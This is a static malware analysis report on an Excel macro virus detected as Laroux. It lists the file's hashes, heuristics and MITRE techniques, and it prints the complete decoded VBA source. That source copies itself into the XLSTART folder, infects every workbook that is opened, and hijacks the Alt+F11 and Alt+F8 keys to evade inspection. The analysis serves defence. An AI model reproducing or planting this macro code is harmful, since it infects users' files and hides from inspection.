Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3db5c38d01d9b0c9…

MALICIOUS

Office (OLE)

32.5 KB Created: 2014-07-16 01:43:51 Authoring application: Microsoft Excel First seen: 2015-01-15
MD5: 16c2fc29e7e1c0a1e4a4590bc46ae19c SHA-1: 1569d86bfb0953034ff8656eda544cbf9de48ea0 SHA-256: 3db5c38d01d9b0c9b3be5dbe79c3f25f07a34862c1744b19240d883b27e88482
208 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1059.005 Visual Basic T1059.005 Visual Basic T1059.005 Visual Basic

The sample contains VBA macros that, upon execution, copy the workbook to the Excel XLSTART startup folder, establishing persistence. It also hooks Excel's interface, specifically the SheetActivate event and F11/F8 keys, to evade inspection. The ClamAV detection 'Doc.Macro.Laroux-5893719-0' further confirms its malicious nature.

Heuristics 6

  • ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
      If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
      Application.OnSheetActivate = "StartUp.xls!ycop"
  • VBA hooks the VBE-editor / macro-list keys to evade inspection high OLE_VBA_VBE_KEY_HOOK_EVASION
    The macro reroutes Alt+F11 (Visual Basic editor) and/or Alt+F8 (macro list) through Application.OnKey, so an analyst's attempt to open the macro code is intercepted. This anti-analysis trick is a hallmark of resident Excel macro viruses hiding the viral module while it is loaded.
    Matched line in script
      Application.OnKey "%{F11}", "StartUp.xls!escape"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 917 bytes
SHA-256: ef12d7355755f09cb7ed5d43609aa9c78ce2121e9043188a92ffb406905a8ca9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    End If
    End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.